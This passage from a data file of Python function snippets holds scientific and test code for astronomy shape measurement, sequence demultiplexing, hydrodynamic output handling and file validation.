dict(sigma=sigma, iterations=iterations)\n\n eclean = []\n e1clean = []\n e2clean = []\n R2clean = []\n eCTI = []\n e1CTI = []\n e2CTI = []\n R2CTI = []\n for file in files:\n #load no cti data\n nocti = pf.getdata(file.replace('CTI', 'nocti'))[ycen-side:ycen+side, xcen-side:xcen+side]\n #subtract background\n nocti -= 27.765714285714285\n nocti[nocti < 0.] = 0. #remove negative numbers\n\n #load CTI data\n CTI = pf.getdata(file)[ycen-side:ycen+side, xcen-side:xcen+side]\n CTI[CTI < 0.] = 0. 
#remove negative numbers\n\n sh = shape.shapeMeasurement(nocti, log, **settings)\n results = sh.measureRefinedEllipticity()\n\n eclean.append(results['ellipticity'])\n e1clean.append(results['e1'])\n e2clean.append(results['e2'])\n R2clean.append(results['R2'])\n\n sh = shape.shapeMeasurement(CTI, log, **settings)\n results = sh.measureRefinedEllipticity()\n\n eCTI.append(results['ellipticity'])\n e1CTI.append(results['e1'])\n e2CTI.append(results['e2'])\n R2CTI.append(results['R2'])\n\n results = {'eclean' : np.asarray(eclean),\n 'e1clean' : np.asarray(e1clean),\n 'e2clean' : np.asarray(e2clean),\n 'R2clean' : np.asarray(R2clean),\n 'eCTI' : np.asarray(eCTI),\n 'e1CTI' : np.asarray(e1CTI),\n 'e2CTI' : np.asarray(e2CTI),\n 'R2CTI' : np.asarray(R2CTI)}\n\n #save to a file\n fileIO.cPickleDumpDictionary(results, 'results.pk')\n\n return results", "def test_main_with_titanium_error(self):\n\n command = \" \".join( [\"%s/denoiser.py\" % get_qiime_scripts_dir(),\n \"--force\", \"-o\", self.test_dir,\n \"-i\", \"%s/qiime/support_files/denoiser/TestData/denoiser_test_set.sff.txt\" % PROJECT_HOME,\n \"-f\", \"%s/qiime/support_files/denoiser/TestData/test_set_seqs.fna\" % PROJECT_HOME,\n \"-e\", \"%s/qiime/support_files/denoiser/Data/Titanium_error_profile.dat\" % PROJECT_HOME] )\n\n result = Popen(command,shell=True,universal_newlines=True,\\\n stdout=PIPE,stderr=STDOUT).stdout.read()\n self.result_dir = self.test_dir\n \n observed = \"\".join(list(open(self.result_dir+ \"centroids.fasta\")))\n self.assertEqual(observed, self.expected)\n \n observed = \"\".join(list(open(self.result_dir+ \"denoiser_mapping.txt\")))\n self.assertEqual(observed,self.expected_titanium_map_string)", "def checkSuccess():\n try:\n relin = np.genfromtxt(\"{}reliability.in\".format(basedir), dtype=str)\n # Accurate argument order\n args = [str(\"\\'\"+probpath+\"\\'\"), str(\"\\'\"+obpath+\"\\'\"),\n str(\"\\'\"+outfile+\"\\'\"),\n fcsthr, str(\"\\'\"+variable+\"\\'\"),\n rthresh, sixhour, nbrhd, rbox_bounds[0],\n rbox_bounds[1], rbox_bounds[2], rbox_bounds[3]]\n success = True # Assume success initially\n # Ensure that each argument was placed into the proper line of the\n # reliability input file\n for ind, line in enumerate(relin):\n # If an argument doesn't line up with the rel in arg, set False\n print(str(args[ind]).replace('\\\\', ''), line)\n if (str(args[ind]).replace('\\\\', '') != line):\n success = False\n print(success)\n except:\n success = False\n return success", "def checkSuccess():\n try:\n relin = np.genfromtxt(\"{}reliability.in\".format(basedir), dtype=str)\n # Accurate argument order\n args = [str(\"\\'\"+probpath+\"\\'\"), str(\"\\'\"+obpath+\"\\'\"),\n str(\"\\'\"+outfile+\"\\'\"),\n fcsthr, str(\"\\'\"+variable+\"\\'\"),\n rthresh, sixhour, nbrhd, rbox_bounds[0],\n rbox_bounds[1], rbox_bounds[2], rbox_bounds[3]]\n success = True # Assume success initially\n # Ensure that each argument was placed into the proper line of the\n # reliability input file\n for ind, line in enumerate(relin):\n # If an argument doesn't line up with the rel in arg, set False\n print(str(args[ind]).replace('\\\\', ''), line)\n if (str(args[ind]).replace('\\\\', '') != line):\n success = False\n print(success)\n except:\n success = False\n return success", "def process_ecr(cas, cas_dir, sortiefile, ncsize):\n\n xcpt = [] # try all files for full report\n # ~~ copy output files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n for key in cas.out_files:\n submit = cas.out_files[key].split(';')\n tmp_file_name = submit[1]\n 
file_name = cas.values[key]\n if submit[5] == 'MULTI': # POSTEL3D\n npsize = 1\n while 1: # HORIZONTAL SECTION FILES\n file_name = path.join(cas_dir,\n file_name\\\n + '_{0:03d}'.format(npsize))\n if path.isfile(file_name):\n base, ext = path.splitext(file_name)\n i = 0\n # this would be an infinite loop only if you have an\n # inifite number of files\n while 1:\n i = i + 1\n if not path.isfile(base+'_old'+str(i)+ext):\n break\n shutil.move(file_name, base+'_old'+str(i)+ext)\n tmp_file_name = tmp_file_name+\\\n '_{0:03d}'.format(npsize)\n if not path.isfile(tmp_file_name):\n break\n shutil.move(tmp_file_name, file_name)\n print(' moving: '+ path.basename(file_name))\n npsize = npsize + 1\n npsize = 1\n while 1: # VERTICAL SECTION FILES\n nptime = 1\n v_file = tmp_file_name+\\\n '_{0:03d}'.format(npsize)+'-{0:03d}'.format(nptime)\n if not path.isfile(v_file):\n break\n while 1:\n file_name = path.join(cas_dir,\n file_name+\\\n '_{0:03d}'.format(npsize)+\\\n '-{0:03d}'.format(nptime))\n if path.isfile(file_name):\n base, ext = path.splitext(file_name)\n i = 0\n # this would be an infinite loop only if you have an\n # inifite number of files\n while 1:\n i = i + 1\n if not path.isfile(base+'_old'+str(i)+ext):\n break\n shutil.move(file_name, base+'_old'+str(i)+ext)\n tmp_file_name = tmp_file_name\\\n + '_{0:03d}'.format(npsize)\\\n + '-{0:03d}'.format(nptime)\n if not path.isfile(tmp_file_name):\n break\n shutil.move(tmp_file_name, file_name)\n print(' moving: '+ path.basename(file_name))\n nptime = nptime + 1\n npsize = npsize + 1\n # MAIN MODULE\n elif submit[5] == 'PARAL' and ncsize > 1:\n npsize = 0\n c_base, c_ext = path.splitext(file_name)\n while 1:\n file_name = path.join(cas_dir,\n c_base\\\n + '{0:05d}-{1:05d}'\\\n .format(ncsize-1, npsize)\\\n + c_ext)\n if path.isfile(file_name):\n base, ext = path.splitext(file_name)\n i = 0\n # this would be an infinite loop only if you have an\n # inifite number of files\n while 1:\n i = i + 1\n if not path.isfile(base+'_old'+str(i)+ext):\n break\n shutil.move(file_name, base+'_old'+str(i)+ext)\n tmp_file_name_par = tmp_file_name+\\\n '{0:05d}-{1:05d}'.format(ncsize-1, npsize)\n if not path.isfile(tmp_file_name_par):\n break\n shutil.move(tmp_file_name_par, file_name) #shutil.copy2(tmp_file_name,file_name)\n print(' moving: '+ path.basename(file_name))\n npsize = npsize + 1\n elif submit[5] == 'MULTI2':\n for itmp_file_name in listdir('.'):\n if itmp_file_name.count(tmp_file_name) == 1:\n base, ext = path.splitext(file_name)\n new_tmp_file_name = \\\n itmp_file_name.lower()\\\n .replace(tmp_file_name.lower(),\n base)\n new_file_name = path.join(cas_dir, new_tmp_file_name) + ext\n if path.isfile(new_file_name):\n base, ext = path.splitext(new_file_name)\n i = 0\n # this would be an infinite loop only if you have an\n # inifite number of files\n while 1:\n i = i + 1\n if not path.isfile(base+'_old'+str(i)+ext):\n break\n shutil.move(new_file_name, base+'_old'+str(i)+ext)\n shutil.move(itmp_file_name, new_file_name)\n print(' moving: '+ path.basename(new_file_name))\n else:\n file_name = path.join(cas_dir, file_name)\n if path.isfile(file_name):\n base, ext = path.splitext(file_name)\n i = 0\n # this would be an infinite loop only if you have an\n # inifite number of files\n while 1:\n i = i + 1\n if not path.isfile(base+'_old'+str(i)+ext):\n break\n shutil.move(file_name, base+'_old'+str(i)+ext)\n if not path.isfile(tmp_file_name):\n xcpt.append({'name':'process_ecr',\n 'msg':'did not create outfile: '+\\\n path.basename(file_name)+' 
('+tmp_file_name+')'})\n continue\n shutil.move(tmp_file_name, file_name)\n print(' moving: '+ path.basename(file_name))\n\n # ~~~ copy the sortie file(s) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n sortiefiles = []\n if sortiefile != None:\n crun = path.basename(sortiefile)\n cref = path.join(cas_dir, sortiefile)\n if not path.isfile(crun):\n xcpt.append({'name':'process_ecr',\n 'msg':'did not create listing file: '+\\\n path.basename(cref)+' ('+crun+')'})\n raise TelemacException(xcpt) # raise full report\n shutil.copy(crun, cref)\n print(' copying: '+ path.basename(cref))\n sortiefiles.append(cref)\n\n # ~~~> If in parallel, also copy the slave log files\n # called PEnnnnn_xxxxx.log\n # for slave x of n but for the last one called the sortie file\n if ncsize > 1:\n for i in range(ncsize-1):\n slavefile = 'PE{0:05d}-{1:05d}.LOG'.format(ncsize-1, i+1)\n base, ext = path.splitext(sortiefile)\n slogfile = base+'_p'+'{0:05d}'.format(i+1)+ext\n crun = slavefile\n cref = path.join(cas_dir, slogfile)\n if not path.isfile(crun):\n xcpt.append({'name':'process_ecr',\n 'msg':'could not find the listing file: '\\\n + crun})\n raise TelemacException(xcpt) # raise full report\n shutil.copy(crun, cref)\n print(' copying: '+ path.basename(cref))\n sortiefiles.append(cref)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n if xcpt != []:\n raise TelemacException(xcpt) # raise full report\n return sortiefiles", "def check_all_files_and_dirs(self):\n err = 0\n err_m = ''\n warning = 0\n warning_m = ''\n # Check the pdb file for refinement\n if self.refine_pdb_in == None:\n err = 1\n err_m += '\\nPdb file should be supplied'\n else:\n if self.check_single_file(self.refine_pdb_in):\n self.refine_pdb_in = os.path.abspath(self.refine_pdb_in)\n else:\n err = 1\n err_m += '\\nFile not found: %s' %(self.refine_pdb_in)\n\n # Check the pdb file for distance analysis\n if self.check_single_file(self.X8_pdb_in):\n self.X8_pdb_in = os.path.abspath(self.X8_pdb_in)\n else:\n self.X8_pdb_in != None\n warning = 1\n warning_m += '\\nXtrapol8 pdb_in not found. No additional analysis will be applied'\n\n # Check additional files and append them to a string\n additional = \"\"\n for fle in self.additional:\n if len(fle)>0:\n if self.check_single_file(fle):\n new_add = os.path.abspath(fle)\n additional = additional + \"%s \" % (new_add)\n else:\n err = 1\n err_m += '\\nFile not found: %s' %(fle)\n self.additional = additional\n\n #Check the output directory\n if os.path.isdir(self.outdir):\n self.outdir = os.path.abspath(self.outdir)\n else:\n err = 1\n err_m += \"\\nXtrapol8 output directory cannot be found.\" \\\n \"Please run this from the same directory from which you ran Xtrapol8.\"\n\n #Check the phil file for reciprocal space refinement\n if self.check_single_file(self.reciprocal_space_phil):\n self.reciprocal_space_phil = os.path.abspath(self.reciprocal_space_phil)\n else:\n self.reciprocal_space_phil = ''\n warning = 1\n warning_m += '\\nPhil for reciprocal space refinement not found. Refinement will use default parameters.'\n\n\n #Check the phil file for real space refinement\n if self.check_single_file(self.real_space_phil):\n self.real_space_phil = os.path.abspath(self.real_space_phil)\n else:\n self.real_space_phil = ''\n warning = 1\n warning_m += '\\nPhil for real space refinement not found. 
Refinement will use default parameters.'\n\n #Check the residue list for distance analysis\n if self.check_single_file(self.residue_list):\n self.residue_list = os.path.abspath(self.residue_list)\n else:\n self.residue_list = None\n warning = 1\n warning_m += '\\nResidue list not found. Distance analysis (if required) will be performed without residue list.'\n\n return err, err_m, warning, warning_m", "def test_differ_times_one_file(generate_differ_times_one_file):\n fname = generate_differ_times_one_file\n with pytest.raises(Exception):\n process_files([fname])", "def check_entry(self, controller, entries, list_of_project_info, error_label):\r\n\r\n for x in range(0, len(entries)):\r\n if entries[x].get() == \"\":\r\n messagebox.showerror(\"Error\", \"Expected no empty fields\")\r\n return\r\n if not entries[2].get().isalpha():\r\n messagebox.showerror(\"Error\", \"Expected column in letter not number, e.g. 'B' \")\r\n return\r\n name_col = self.col_to_num(entries[2].get())\r\n self.write_to_indata(entries)\r\n\r\n list_error,error_present = [], []\r\n list_error = controller.start_config(entries, name_col, list_error, list_of_project_info)\r\n if len(list_error) == 0:\r\n message = \"Successfully generated all state files\"\r\n error_present.append(message)\r\n error_label.config(text=\"Successfully generated all state files\")\r\n else:\r\n for element in list_error:\r\n if element.error_type == \"1\": # error in loop_trough_row\r\n message = \"expected error in excel spreadsheet at row\" + str(element.file_name) + \"\\n\"\r\n elif element.error_type == \"2\": #filname missing\r\n message = \"expected error in file \" + str(element.file_name)+ \"\\n\"\r\n elif element.error_type == \"3\": # Filename error\r\n message = \"expected error in file name at row \" + str(element.file_name) + \"\\n\"\r\n elif element.error_type == \"4\": # \"Seems like error in 1:st or 3:rd line in excel sheet\"\r\n message = \"expected error in excel spreadsheet on 1:st or 3:rd row \" + \"\\n\"\r\n error_present.append(message)\r\n error_report = open(\"error_report.txt\", \"w+\")\r\n error_report.write(''.join(error_present))\r\n error_report.close()\r\n error_label.config(text=\"Error occured, check error report in \"+ entries[1].get())\r\n # error_label.config(text=(''.join(error_present)))\r", "def test_check_cds_6(self):\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\")\n self.assertEqual(count, 0)", "def test_differentSizedDetectors(self):\n files = [getFile(fp)\n for fp in ['bwr_0_det0.m', 'bwr_smallxy_det0.m']]\n self._raisesMisMatchError(files)\n self.assertMsgInLogs(\n \"ERROR\", \"shape: Parser files\",\n partial=True)", "def checkFiles(genomesList):\n global GENOMES\n newGenomesList = []\n\n for genome_file in genomesList:\n flag = 0\n\n #Going through the file to confirm it is a valid fasta file\n for record in SeqIO.parse(genome_file, \"fasta\"):\n match = re.search('(^[a-zA-Z]+)', str(record.seq))\n if not match:\n flag = 0\n break\n else:\n flag = 1\n\n if flag>0:\n newGenomesList.append(genome_file)\n\n filename = os.path.basename(genome_file)\n filename = os.path.splitext(filename)\n\n #Go through the file to obtain the genome name\n for record in SeqIO.parse(genome_file,\"fasta\"):\n genome_name = getGenomeName(record.description, filename[0])\n if not genome_name in GENOMES:\n GENOMES[genome_name] = ''\n\n else:\n logging.warning(\"File \" + genome_file + \" is in invalid format\")\n\n if not newGenomesList:\n logging.error(\"No valid fasta 
files \\n Exiting\")\n return 'Error'\n\n else:\n return sorted(newGenomesList)", "def test_validate_fasta_with_invalid(self):\r\n\r\n validate_fasta(self.sample_fasta_invalid_fp, self.sample_mapping_fp,\r\n self.output_dir)\r\n\r\n expected_log_fp = join(self.output_dir,\r\n split(self.sample_fasta_invalid_fp)[1] + \"_report.log\")\r\n\r\n log_f = open(expected_log_fp, \"U\")\r\n actual_log_lines = [line.strip() for line in log_f][1:]\r\n\r\n expected_log_lines = \"\"\"Percent duplicate labels: 0.250\r\nPercent QIIME-incompatible fasta labels: 0.500\r\nPercent of labels that fail to map to SampleIDs: 0.750\r\nPercent of sequences with invalid characters: 0.500\r\nPercent of sequences with barcodes detected: 0.250\r\nPercent of sequences with barcodes detected at the beginning of the sequence: 0.000\r\nPercent of sequences with primers detected: 0.250\r\nDuplicate labels found:\r\nseq1\"\"\".split('\\n')\r\n\r\n self.assertEqual(actual_log_lines, expected_log_lines)", "def final_output_analysis(samples_dict, dir_results_path):\n with open(path.join(dir_results_path, 'corrupted_processes.txt'), 'w', encoding='utf-8', errors='replace') as c_out:\n with open(path.join(dir_results_path, 'analysis.txt'), 'w', encoding='utf-8', errors='replace') as i_out:\n with open(path.join(dir_results_path, 'syscalls.txt'), 'w', encoding='utf-8', errors='replace') as s_out:\n for uuid in sorted(samples_dict.keys()):\n reduced_sample = samples_dict[uuid]\n\n i_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n s_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n c_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n\n # corrupted processes section\n process_repr = '\\t\\t{:15s}\\t{:10d}\\t{:15s}\\tby:\\t{:15s}\\t{:10d}\\n'\n for process in reduced_sample.corrupted_processes:\n c_out.write(process_repr.format(process[0],\n process[1],\n process[2],\n process[3],\n process[4]))\n\n # instruction count section\n i_out.write(string_utils.out_final + '\\t' + str(reduced_sample.total_instruction) + '\\n')\n i_out.write(string_utils.out_terminating + '\\t' + str(reduced_sample.terminate_all) + '\\t')\n i_out.write(string_utils.out_sleeping + '\\t' + str(reduced_sample.sleep_all) + '\\t')\n i_out.write(string_utils.out_crashing + '\\t' + str(reduced_sample.crash_all) + '\\t')\n i_out.write(string_utils.out_raising_error + '\\t' + str(reduced_sample.error_all) + '\\t')\n i_out.write(string_utils.out_writes_file + '\\t' + str(reduced_sample.write_file) + '\\n')\n\n # system calls count section\n s_out.write(string_utils.syscall_final + '\\t' + str(reduced_sample.total_syscalls) + '\\n')\n\n i_out.write('\\n')\n s_out.write('\\n')\n c_out.write('\\n')", "def merge(self , station = '' , datasets = '' , mode = 'test'):\n\n if mode == \"test\": \n a = self.initialize_data( station = station, datasets = datasets ) # reading the input files \n dummy = self.merge_all_data() \n #logging.info('*** Finished merging, now writing the output netCDF file ***' ) \n #a = self.write_merged_file()\n #logging.info('*** Done writing the output ! ***')\n return True\n\n else:\n o = open(\"FAILED_MERGING_LIST.txt\", 'a+') \n try:\n a = self.initialize_data( station = station, datasets = datasets ) # reading the input files \n dummy = self.merge_all_data() \n #logging.info('*** Finished merging, now writing the output netCDF file ***' ) \n #a = self.write_merged_file()\n #logging.info('*** Done writing the output ! 
***')\n return True \n except MemoryError:\n print('Failed: ' , station )\n o.write(station + '\\n' )\n return False", "def test_errors_on_output(self):\n mb = self.maria_backup\n\n # normal run\n errors = b\"\"\"\n 220309 11:19:09 Finished backing up non-InnoDB tables and files\n 220309 11:19:09 Executing FLUSH NO_WRITE_TO_BINLOG ENGINE LOGS...\n xtrabackup: The latest check point (for incremental): '92134324'\n xtrabackup: Stopping log copying thread..\n 220309 11:19:10 >> log scanned up to (900123121)\n 220309 11:19:10 Executing UNLOCK TABLES\n 220309 11:19:10 All tables unlocked\n 220309 11:19:10 Backup created in directory '/a/dir'\n 220309 11:19:10 [00] Writing backup-my.cnf\n 220309 11:19:10 [00] ...done\n 220309 11:19:10 [00] Writing xtrabackup_info\n 220309 11:19:10 [00] ...done\n xtrabackup: Transaction log of lsn (89423125) to (900123121) was copied.\n 220309 11:19:10 completed OK!\n \"\"\"\n self.assertFalse(mb.errors_on_output(b'', errors))\n\n # failed run\n errors = b\"\"\"\n xtrabackup: error: log block numbers mismatch:\n xtrabackup: error: expected log block no. 293842034, but got no. 13324598 from the log file.\n xtrabackup: error: it looks like InnoDB log has wrapped around before xtrabackup\n could process all records due to either log copying being too slow, or log files being too small.\n xtrabackup: Error: xtrabackup_copy_logfile() failed\n \"\"\"\n self.assertTrue(mb.errors_on_output(b'', errors))", "def testCTIcorrectionNonoise(log, files, output, sigma=0.75, iterations=4):\n eclean = []\n e1clean = []\n e2clean = []\n R2clean = []\n xclean = []\n yclean = []\n eCTI = []\n e1CTI = []\n e2CTI = []\n R2CTI = []\n xCTI = []\n yCTI = []\n eCTIfixed = []\n e1CTIfixed = []\n e2CTIfixed = []\n R2CTIfixed = []\n xCTIfixed = []\n yCTIfixed = []\n\n fh = open(output.replace('pk', 'csv'), 'w')\n fh.write('#file, delta_e, delta_e1, delta_e2, delta_R2, delta_x, delta_y\\n')\n for f in files:\n print 'Processing: ', f\n\n #reset settings\n settings = dict(sigma=sigma, iterations=iterations)\n\n #load no cti data\n nocti = pf.getdata(f.replace('CUT', 'CUTnoctinonoise'))\n\n #load CTI data\n CTI = pf.getdata(f)\n\n sh = shape.shapeMeasurement(nocti, log, **settings)\n results = sh.measureRefinedEllipticity()\n\n eclean.append(results['ellipticity'])\n e1clean.append(results['e1'])\n e2clean.append(results['e2'])\n R2clean.append(results['R2'])\n xclean.append(results['centreX'])\n yclean.append(results['centreY'])\n\n #CTI, fitted centroid\n sh = shape.shapeMeasurement(CTI.copy(), log, **settings)\n results2 = sh.measureRefinedEllipticity()\n\n eCTI.append(results2['ellipticity'])\n e1CTI.append(results2['e1'])\n e2CTI.append(results2['e2'])\n R2CTI.append(results2['R2'])\n xCTI.append(results2['centreX'])\n yCTI.append(results2['centreY'])\n\n #fixed centroid\n settings['fixedPosition'] = True\n settings['fixedX'] = results['centreX']\n settings['fixedY'] = results['centreY']\n settings['iterations'] = 1\n sh = shape.shapeMeasurement(CTI.copy(), log, **settings)\n results3 = sh.measureRefinedEllipticity()\n\n eCTIfixed.append(results3['ellipticity'])\n e1CTIfixed.append(results3['e1'])\n e2CTIfixed.append(results3['e2'])\n R2CTIfixed.append(results3['R2'])\n xCTIfixed.append(results3['centreX'])\n yCTIfixed.append(results3['centreY'])\n\n text = '%s,%e,%e,%e,%e,%e,%e\\n' % (f, results['ellipticity'] - results2['ellipticity'],\n results['e1'] - results2['e1'], results['e2'] - results2['e2'], results['R2'] - results2['R2'],\n results['centreX'] - results2['centreX'], 
results['centreY'] - results2['centreY'])\n fh.write(text)\n print text\n\n fh.close()\n\n results = {'eclean' : np.asarray(eclean),\n 'e1clean' : np.asarray(e1clean),\n 'e2clean' : np.asarray(e2clean),\n 'R2clean' : np.asarray(R2clean),\n 'xclean' : np.asarray(xclean),\n 'yclean' : np.asarray(yclean),\n 'eCTI' : np.asarray(eCTI),\n 'e1CTI' : np.asarray(e1CTI),\n 'e2CTI' : np.asarray(e2CTI),\n 'R2CTI' : np.asarray(R2CTI),\n 'xCTI' : np.asarray(xCTI),\n 'yCTI' : np.asarray(yCTI),\n 'eCTIfixed': np.asarray(eCTIfixed),\n 'e1CTIfixed': np.asarray(e1CTIfixed),\n 'e2CTIfixed': np.asarray(e2CTIfixed),\n 'R2CTIfixed': np.asarray(R2CTIfixed),\n 'xCTIfixed': np.asarray(xCTIfixed),\n 'yCTIfixed': np.asarray(yCTIfixed)}\n\n #save to a file\n fileIO.cPickleDumpDictionary(results, output)\n\n return results", "def test_all_merge(self):\n\n test_folder = os.path.join('test_data', 'merging_tests', 'batch_test')\n # test_folder = base_path + '/test_data/merging_tests/batch_test/'\n results_folder = os.path.join(test_folder, 'results')\n # results_folder = test_folder+\"results/\"\n\n if not os.path.isdir(results_folder):\n os.mkdir(results_folder)\n\n # delete all files in output folder\n for the_file in os.listdir(results_folder):\n file_path = os.path.join(results_folder, the_file)\n if os.path.isfile(file_path):\n os.unlink(file_path)\n\n backgrounds_folder = os.path.join(test_folder, 'backgrounds')\n obj_poses_folder = os.path.join(test_folder, 'object_poses')\n\n mi.generate_for_all_objects(obj_poses_folder, backgrounds_folder, results_folder, adjust_brightness = True)\n self.assertEqual(len(os.listdir(obj_poses_folder)), len(os.listdir(results_folder)))\n\n for the_file in os.listdir(results_folder):\n file_path = os.path.join(results_folder, the_file)\n im = Image.open(file_path)\n self.assertEqual((300,300), im.size)\n self.assertEqual('JPEG', im.format)\n self.assertNotEqual('PNG', im.format)", "def test_assign_seqs_error_correction(self):\r\n\r\n # Handles single fasta and single qual with error correction\r\n file_data = {}\r\n file_data['fasta_files'] = [self.valid_fasta_file_with_bc_errors]\r\n file_data['qual_files'] = [self.valid_qual_file_no_errors]\r\n file_data['demultiplexed_seqs_f'] = FakeOutFile()\r\n file_data['demultiplexed_qual_f'] = FakeOutFile()\r\n\r\n ids_bcs_added_field = {('AACTCGTCGATG', ''): 's1',\r\n ('AGCAGCACTTGT', ''): 's2', ('ACCGCAGAGTCA', ''): 's3'}\r\n bc_lens = [12]\r\n all_bcs = ['AACTCGTCGATG', 'AGCAGCACTTGT', 'ACCGCAGAGTCA']\r\n keep_barcode = False\r\n barcode_type = \"golay_12\"\r\n max_bc_errors = 1.5\r\n start_index = 1\r\n write_unassigned_reads = False\r\n disable_bc_correction = False\r\n added_demultiplex_field = None\r\n\r\n log_data, bc_freqs, seq_counts, corrected_bc_count =\\\r\n assign_seqs(file_data, ids_bcs_added_field, bc_lens, all_bcs,\r\n keep_barcode, barcode_type, max_bc_errors, start_index,\r\n write_unassigned_reads, disable_bc_correction,\r\n added_demultiplex_field)\r\n\r\n expected_demultiplexed_fasta_seq = '>s1_1 ABCD0001 orig_bc=TACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=1\\nCAGGACGAGACGAGGTT\\n>s3_2 EFGH0002 orig_bc=GCCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=1\\nCCAGATTACGAGATTA\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\nGACCGATTACGATAACG\\n'\r\n expected_demultiplexed_qual_seq = '>s1_1 ABCD0001 orig_bc=TACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=1\\n30 26 11 11 29 20 19 16 24 17 29 28 11 27 14 24 24\\n>s3_2 EFGH0002 orig_bc=GCCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=1\\n12 14 27 23 22 19 24 18 19 20 28 10 17 14 
17 13\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\n10 20 16 20 25 27 22 28 16 22 16 18 12 13 16 25 17\\n'\r\n self.assertEqual(file_data['demultiplexed_seqs_f'].data,\r\n expected_demultiplexed_fasta_seq)\r\n self.assertEqual(file_data['demultiplexed_qual_f'].data,\r\n expected_demultiplexed_qual_seq)\r\n\r\n expected_log_data = {'ACCGCAGAGTCA,s3': 1, 'AACTCGTCGATG,s1': 1,\r\n 'AGCAGCACTTGT,s2': 1}\r\n expected_bc_freqs = {'TACTCGTCGATG': 1, 'GCCGCAGAGTCA': 1,\r\n 'AGCAGCACTTGT': 1}\r\n expected_seq_counts = 3\r\n expected_corrected_bc_count = [2, 0]\r\n\r\n self.assertEqual(log_data, expected_log_data)\r\n self.assertEqual(bc_freqs, expected_bc_freqs)\r\n self.assertEqual(seq_counts, expected_seq_counts)\r\n self.assertEqual(corrected_bc_count, expected_corrected_bc_count)", "def test_validation_wrong_molecules():\n paths = examples_paths()\n paths['wrongformat'] = utils.get_data_filename(os.path.join('tests', 'data', 'README.md'))\n molecules = [\n {'antechamber': {'charge_method': 'bcc'}},\n {'filepath': paths['wrongformat']},\n {'name': 'p-xylene', 'antechamber': {'charge_method': 'bcc'}, 'unknown': 4},\n {'smiles': 'Cc1ccccc1', 'openeye': {'quacpac': 'am1-bcc'}},\n {'smiles': 'Cc1ccccc1', 'openeye': {'quacpac': 'invalid'},\n 'antechamber': {'charge_method': None}},\n {'smiles': 'Cc1ccccc1', 'openeye': {'quacpac': 'am1-bcc'},\n 'antechamber': {'charge_method': 'bcc'}},\n {'filepath': 'nonexistentfile.pdb', 'leap': {'parameters': 'leaprc.ff14SB'}},\n {'filepath': paths['toluene'], 'smiles': 'Cc1ccccc1'},\n {'filepath': paths['toluene'], 'strip_protons': True},\n {'filepath': paths['abl'], 'leap': {'parameters': 'oldff/leaprc.ff14SB'}, 'epik': {'select': 0}},\n {'name': 'toluene', 'epik': 0},\n {'name': 'toluene', 'epik': {'tautomerize': 6}},\n {'name': 'toluene', 'epik': {'extract_range': 1}},\n {'name': 'toluene', 'smiles': 'Cc1ccccc1'},\n {'name': 3},\n {'smiles': 'Cc1ccccc1', 'select': 1},\n {'name': 'Cc1ccccc1', 'select': 1},\n {'filepath': paths['abl'], 'leap': {'parameters': 'oldff/leaprc.ff14SB'}, 'select': 'notanoption'},\n {'filepath': paths['abl'], 'regions': 5},\n {'filepath': paths['abl'], 'regions': {'a_region': [-56, 5.23]}},\n {'filepath': paths['toluene'], 'leap': {'parameters': 'leaprc.gaff'}, 'strip_protons': True},\n ]\n for molecule in molecules:\n yield assert_raises, YamlParseError, ExperimentBuilder._validate_molecules, {'mol': molecule}", "def test_combine_alignments(self):\n lines1 = ['>a','AATTGGCC','>b','AATTAATT']\n lines2 = ['>c','AATTAGCC','>d','AATTGATT']\n exp = {'a':'AATTGGCC','b':'AATTAATT', \n 'c':'AATTAGCC','d':'AATTGATT'}\n obs = combine_alignments(lines1, lines2)\n self.assertEqual(obs, exp)\n\n lines1 = ['>a','AATTGGCC','>b','AATTAATT']\n lines2 = ['>a','AATTAACC','>C','AATTGATT']\n self.assertRaises(ValueError, combine_alignments, lines1, lines2)", "def test_strain_not_in(generate_no_strain_one_file):\n fname = generate_no_strain_one_file\n with pytest.raises(Exception) as f:\n process_files([fname])", "def test_content_file(self):\n\n url=[\"http://archive.ics.uci.edu/ml/machine-learning-databases/wine/wine.data\",\n \"http://archive.ics.uci.edu/ml/machine-learning-databases/car/car.data\",\n \"http://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\"]\n cwd=os.getcwd()\n list_of_files=requester.batch_url_to_csv(url, fnames=[\"m1\", \"m2\",\"m3\"])\n total_rows=0\n reader_list=[]\n for j in range(len(list_of_files)):\n reader=csv.DictReader(list_of_files[j])\n for rows in reader:\n total_rows+=1\n 
reader_list.append(total_rows)\n\n unique=set((reader_list))\n if len(unique)!=len(reader_list):\n with self.assertRaises(AssertionError):\n requester.batch_url_to_csv(url,fnames=['m1','m2','m3'])", "def makeObjcats(self):\n curdir = os.getcwd()\n os.chdir(self.astromdir)\n # make the sxtr paramfiles and run with them\n self._setupSxtrFiles()\n\n self.objcats = []\n self.projcats = []\n for imsci in self.sciImlist:\n rmsfile = imsci.split(\"_sci\")[0]+'_RMS.fits'\n if rmsfile not in self.rmsImlist:\n errtxt = \"Expected file %s not in rmsImlist!\" %rmsfile\n self.logfile.write(errtxt)\n self.errorList.append((self.modName,errtxt))\n return -1\n tmpcat = imsci.split(\"_sci\")[0]+'.tmp'\n cmd = 'sex %s -c %s -CATALOG_NAME %s -WEIGHT_IMAGE %s' \\\n %(os.path.join(self.Imagedir,imsci), self.inparFile, \\\n tmpcat, os.path.join(self.Imagedir,rmsfile))\n self.logfile.write(' '+cmd)\n sproc = popen2.Popen4(cmd, 1)\n errs = sproc.fromchild.readlines()\n sproc.fromchild.close()\n\n if errs:\n self.logfile.write(\"Sxtr seems to have choked a bit:\")\n for line in errs:\n self.logfile.write(line)\n self.errorList.append((self.modName,line))\n\n try:\n sxtlines = 